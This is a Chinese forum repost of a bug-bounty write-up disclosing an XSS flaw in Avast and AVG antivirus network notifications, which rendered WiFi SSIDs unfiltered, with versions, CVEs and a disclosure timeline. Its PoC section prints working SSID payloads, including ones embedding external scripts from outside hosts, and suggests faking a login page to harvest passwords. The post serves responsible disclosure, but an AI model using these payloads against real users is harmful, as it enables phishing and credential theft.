用户
搜索
  • TA的每日心情
    擦汗
    2019-1-31 10:58
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    官方账号

    Rank: 7Rank: 7Rank: 7

    165

    主题

    165

    帖子

    1557

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2018-12-21

    i春秋认证

    发表于 2019-11-1 21:02:18 0730

    22.jpg

    总结

    SSID:无线局域网的标识符(WiFi的名字)
    

    1.利用简单的XSS Payload构造一个SSID名字,你可以参考BruteLogics0md3v

    2.在已安装好Avast杀毒软件的电脑上连接无线网络,选择由XSS构成的SSID,等待payload生效。

    33.png

    3.向Avast报告这个漏洞,几个月后他们决定给我5000美元的奖金。

    过程

    在以前我曾看过有些研究人员会把XSS插入SSID中,等待其他应用和无线网络进行交互,观察是否有攻击生效迹象,于是我也很快制作了一个特殊SSID的无线网络。

    而在几个月前,我得到了一个新的笔记本电脑,在安装完必须软件后,还下载了Avast杀毒软件。此时一切都很正常,没有任何异常。

    直到有一天我再次使用这个笔记本来进行学习时,突然网络出现波动,笔记本自动连接到我“特意制作”的WiFi中,几秒钟之内,我的桌面上出现了一个弹框警告[https://local.avast.com](https://local.avast.com)

    当时我异常震惊,完全想不到为何会出现这种事。后来我才发现是Avast的“网络通知功能”在没有进行安全过滤的情况下直接选取了SSID。

    我随后立即编写了漏洞报告,发送给Avast。

    概要

    Avast杀毒软件之所以会提取SSID,是因为它有监控流量的功能,在用户连接到某个新的网络中,就会向用户发出警报。例如下图就是当用户连接上My Hotspot无线网络时的警报。

    44.png

    此时SSID出现在窗口的中央,这也就是XSS注入的位置。虽然SSID一般有32个字符的长度限制,但是我们还是可以通过其他研究员的智慧进行攻击(Brute LogicS0md3v)。值得一提的是,2013年,Deral Heiland就已在这方面有很深的研究

    影响版本

    Avast Internet Security的19.3.2369版本和AVG Internet Security的19.3.3084版本均受到影响。

    实际应用

    你可以伪造一个登录页面,要求用户输入敏感的帐户和密码。由于Avast的存在,普通用户可能因麻痹大意而中招。

    55.png

    66.png

    PoC

    1.只需要使用简单的><img src=x onerror=prompt(1)>作为SSID即可。

    2.受害者只要连接上攻击者的无线网络,几秒内就会中招。

    77.png

    88.png

    3.由于SSID长度的限制,如果想引用外部脚本,可以使用><embed src=//tiny.cc/XYZABCX>

    99.png

    100.png

    除此之外,还有><embed src=//14.rs>

    110.png

    演示视频:https://youtu.be/WdqTJp_I8_M
    

    时间线

    2019年3月21日:发现了漏洞

    2019年3月22日:向bugs@avast.com报告了漏洞

    2019年3月25日:Avast确认漏洞的存在

    2019年5月24日:Avast询问此漏洞是否已解决(在Avast 19.4中)。

    2019年6月12日:Avast认为此漏洞相当严重,因此决定奖励5000美元。

    2019年10月30日:Avast上的注入被标记为CVE-2019–18653,AVG上的注入被标记为CVE-2019–18654

    最后我想说的是,这个漏洞是在笔记本上发现的,安卓或苹果的移动设备也可能存在类似问题。

    参考

    感谢你的阅读!

    本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/3118.html
    来源:https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
    
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册